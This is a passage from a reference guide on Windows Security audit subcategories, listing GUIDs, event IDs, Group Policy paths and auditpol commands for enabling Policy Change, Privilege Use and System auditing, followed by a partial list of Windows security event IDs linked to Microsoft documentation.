Other Policy Change Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9234-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9234-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-policy-change-events)\n\n### Privilege Use\n\n#### Non Sensitive Privilege Use\n\n- Subcategory GUID: `{0CCE9229-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Very High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4673\n  - 4674\n  - 4985\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Privilege Use\n                        - Audit Non Sensitive Privilege Use\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9229-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9229-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-non-sensitive-privilege-use)\n\n#### Other Privilege Use Events\n\n- Subcategory GUID: `{0CCE922A-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4985\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Privilege Use\n                          - Audit Other Privilege Use Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922A-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-privilege-use-events)\n\n#### Sensitive Privilege Use\n\n- Subcategory GUID: `{0CCE9228-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4673, 4674, 4985\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Privilege Use\n                          - Audit Sensitive Privilege Use\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9228-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9228-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-sensitive-privilege-use)\n\n### System\n\n#### IPsec Driver\n\n- Subcategory GUID: `{0CCE9213-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4960\n  - 4961\n  - 4962\n  - 4963\n  - 4965\n  - 5478\n  - 5479\n  - 5480\n  - 5483\n  - 5484\n  - 5485\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - System\n                        - Audit IPsec Driver\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9213-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9213-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-driver)\n\n#### Other System Events\n\n- Subcategory GUID: `{0CCE9214-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 5024\n  - 5025\n  - 5027\n  - 5028\n  - 5029\n  - 5030\n  - 5032\n  - 5033\n  - 5034\n  - 5035\n  - 5037\n  - 5058\n  - 5059\n  - 6400\n  - 6401\n  - 6402\n  - 6403\n  - 6404\n  - 6405\n  - 6406\n  - 6407\n  - 6408\n  - 6409\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - System\n                        - Audit Other System Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9214-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9214-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-system-events)\n\n#### Security State Change\n\n- Subcategory GUID: `{0CCE9210-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4608\n  - 4616\n  - 4621\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - System\n                        - Audit Security State Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9210-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9210-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-state-change)\n\n#### Security System Extension\n\n- Subcategory GUID: `{0CCE9211-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4610\n  - 4611\n  - 4614\n  - 4622\n  - 4697\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - System\n                        - Audit Security System Extension\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9211-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9211-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-system-extension)\n\n#### System Integrity\n\n- Subcategory GUID: `{0CCE9212-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4612\n  - 4615\n  - 4618\n  - 4816\n  - 5038\n  - 5056\n  - 5062\n  - 5057\n  - 5060\n  - 5061\n  - 6281\n  - 6410\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - System\n                        - Audit System Integrity\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9212-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9212-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-system-integrity)\n\n### Global Object Access Auditing\n\nTBD\n\n## Full Event(s) List\n\n<details>\n    <summary>Expand Full List</summary>\n\n- [1100: The event logging service has shut down.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1100)\n- [1102: The audit log was cleared.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1102)\n- [1104: The security log is now full.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1104)\n- [1105: Event log automatic backup.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1105)\n- [1108: The event logging service encountered an error while processing an incoming event published from %1](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1108)\n- [4608: Windows is starting up.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4608)\n- [4610: An authentication package has been loaded by the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4610)\n- [4611: A trusted logon process has been registered with the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4611)\n- [4612: Internal resources allocated for the queuing of audit messages have been exhausted, leading to the loss of some audits.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4612)\n- [4614: A notification package has been loaded by the Security Account Manager.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4614)\n- [4615: Invalid use of LPC port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4615)\n- [4616: The system time was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616)\n- [4618: A monitored security event pattern has occurred.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4618)\n- [4621: Administrator recovered system from CrashOnAuditFail.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4621)\n- [4622: A security package has been loaded by the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4622)\n- [4624: An account was successfully logged on.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624)\n- [4625: An account failed to log on.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625)\n- [4625: An account failed to log on.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625)\n- [4626: User/Device claims information.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4626)\n- [4627: Group membership information.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4627)\n- [4634: An account was logged off.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634)\n- [4646: Security ID: %1](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4646)\n- [4647: User initiated logoff.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647)\n- [4648: A logon was attempted using explicit credentials.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4648)\n- [4649: A replay attack was detected.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649)\n- [4650: An IPsec Main Mode security association was established. Extended Mode was not enabled. Certificate authentication was not used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4650)\n- [4651: An IPsec Main Mode security association was established. Extended Mode was not enabled. A certificate was used for authentication.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4651)\n- [4652: An IPsec Main Mode negotiation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4652)\n- [4653: An IPsec Main Mode negotiation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4653)\n- [4655: An IPsec Main Mode security association ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4655)\n- [4656: A handle to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656)\n- [4657: A registry value was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4657)\n- [4658: The handle to an object was closed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4658)\n- [4660: An object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4660)\n- [4661: A handle to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661)\n- [4662: An operation was performed on an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662)\n- [4663: An attempt was made to access an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4663)\n- [4664: An attempt was made to create a hard link.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4664)\n- [4665: An attempt was made to create an application client context.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4665)\n- [4666: An application attempted an operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4666)\n- [4667: An application client context was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4667)\n- [4668: An application was initialized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4668)\n- [4670: Permissions on an object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4670)\n- [4671: An application attempted to access a blocked ordinal through the TBS.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4671)\n- [4672: Special privileges assigned to new logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672)\n- [4673: A privileged service was called.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673)\n- [4674: An operation was attempted on a privileged object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4674)\n- [4675: SIDs were filtered.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4675)\n- [4688: A new process has been created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4688)\n- [4689: A process has exited.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4689)\n- [4690: An attempt was made to duplicate a handle to an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4690)\n- [4691: Indirect access to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4691)\n- [4692: Backup of data protection master key was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4692)\n- [4693: Recovery of data protection master key was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4693)\n- [4694: Protection of auditable protected data was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4694)\n- [4695: Unprotection of auditable protected data was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4695)\n- [4696: A primary token was assigned to process.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4696)\n- [4697: A service was installed in the system.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4697)\n- [4698: A scheduled task was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698)\n- [4699: A scheduled task was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699)\n- [4700: A scheduled task was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4700)\n- [4701: A scheduled task was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701)\n- [4702: A scheduled task was updated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4702)\n- [4703: A user right was adjusted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4703)\n- [4703: A user right was adjusted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4703)\n- [4704: A user right was assigned.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4704)\n- [4705: A user right was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4705)\n- [4706: A new trust was created to a domain.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706)\n- [4707: A trust to a domain was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4707)\n- [4709: IPsec Services was started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4709)\n- [4710: IPsec Services was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4710)\n- [4711: May contain any one of the following:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4711)\n- [4712: IPsec Services encountered a potentially serious failure.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4712)\n- [4713: Kerberos policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4713)\n- [4714: Encrypted data recovery policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4714)\n- [4715: The audit policy (SACL) on an object was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4715)\n- [4716: Trusted domain information was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4716)\n- [4717: System security access was granted to an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4717)\n- [4718: System security access was removed from an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4718)\n- [4719: System audit policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4719)\n- [4720: A user account was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720)\n- [4722: A user account was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4722)\n- [4723: An attempt was made to change an account's password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4723)\n- [4724: An attempt was made to reset an account's password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724)\n- [4725: A user account was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4725)\n- [4726: A user account was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4726)\n- [4727: A security-enabled global group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4727)\n- 4728: A member was added to a security-enabled global group\n- [4729: A member was removed from a security-enabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4729)\n- [4730: A security-enabled global group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4730)\n- [4731: A security-enabled local group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4731)\n- [4732: A member was added to a security-enabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4732)\n- [4733: A member was removed from a security-enabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4733)\n- [4734: A security-enabled local group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4734)\n- [4735: A security-enabled local group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4735)\n- [4737: A security-enabled global group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4737)\n- [4738: A user account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738)\n- [4739: Domain Policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4739)\n- [4740: A user account was locked out.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4740)\n- [4741: A computer account was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741)\n- [4742: A computer account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4742)\n- [4743: A computer account was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743)\n- [4744: A security-disabled local group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4744)\n- [4745: A security-disabled local group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4745)\n- [4746: A member was added to a security-disabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4746)\n- [4747: A member was removed from a security-disabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4747)\n- [4748: A security-disabled local group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4748)\n- [4749: A security-disabled global group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4749)\n- [4750: A security-disabled global group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4750)\n- [4751: A member was added to a security-disabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4751)\n- [4752: A member was removed from a security-disabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4752)\n- [4753: A security-disabled global group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4753)\n- [4754: A security-enabled universal group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4754)\n- [4755: A security-enabled universal group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4755)\n- [4756: A member was added to a security-enabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4756)\n- [4757: A member was removed from a security-enabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4757)\n- [4758: A security-enabled universal group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4758)\n- [4759: A security-disabled universal group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4759)\n- [4760: A security-disabled universal group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4760)\n- [4761: A member was added to a security-disabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4761)\n- [4762: A member was removed from a security-disabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4762)\n- [4763: A security-disabled universal group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4763)\n- [4764: A group's type was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4764)\n- [4765: SID History was added to an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4765)\n- [4766: An attempt to add SID History to an account failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4766)\n- [4767: A user account was unlocked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4767)\n- [4768: A Kerberos authentication ticket (TGT) was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768)\n- [4769: A Kerberos service ticket was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4769)\n- [4770: A Kerberos service ticket was renewed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4770)\n- [4771: Kerberos pre-authentication failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771)\n- [4772: A Kerberos authentication ticket request failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4772)\n- [4773: A Kerberos service ticket request failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4773)\n- [4774: An account was mapped for logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4774)\n- [4775: An account could not be mapped for logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4775)\n- [4776: The computer attempted to validate the credentials for an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776)\n- [4777: The domain controller failed to validate the credentials for an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4777)\n- [4778: A session was reconnected to a Window Station.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4778)\n- [4779: A session was disconnected from a Window Station.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4779)\n- [4780: The ACL was set on accounts which are members of administrators groups.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4780)\n- [4781: The name of an account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4781)\n- [4782: The password hash of an account was accessed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4782)\n- [4783: A basic application group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4783)\n- [4784: A basic application group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4784)\n- [4785: A member was added to a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4785)\n- [4786: A member was removed from a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4786)\n- [4787: A non-member was added to a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4787)\n- [4788: A non-member was removed from a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4788)\n- [4789: A basic application group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4789)\n- [4790: An LDAP query group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4790)\n- [4791: An LDAP query group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4791)\n- [4792: An LDAP query group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4792)\n- [4793: The Password Policy Checking API was called.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4793)\n- [4794: An attempt was made to set the Directory Services Restore Mode administrator password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4794)\n- [4798: A user's local group membership was enumerated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4798)\n- [4799: A security-enabled local group membership was enumerated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799)\n- [4800: The workstation was locked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4800)\n- [4801: The workstation was unlocked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4801)\n- [4802: The screen saver was invoked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4802)\n- [4803: The screen saver was dismissed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4803)\n- [4816: RPC detected an integrity violation while decrypting an incoming message.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4816)\n- [4817: Auditing settings on object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4817)\n- [4818: Proposed Central Access Policy does not grant the same access permissions as the current Central Access Policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4818)\n- [4819: Central Access Policies on the machine have been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4819)\n- [4826: Boot Configuration Data loaded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4826)\n- [4864: A namespace collision was detected.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4864)\n- [4865: A trusted forest information entry was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4865)\n- [4866: A trusted forest information entry was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4866)\n- [4867: A trusted forest information entry was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4867)\n- [4868: The certificate manager denied a pending certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4868)\n- [4869: Certificate Services received a resubmitted certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4869)\n- [4870: Certificate Services revoked a certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4870)\n- [4871: Certificate Services received a request to publish the certificate revocation list 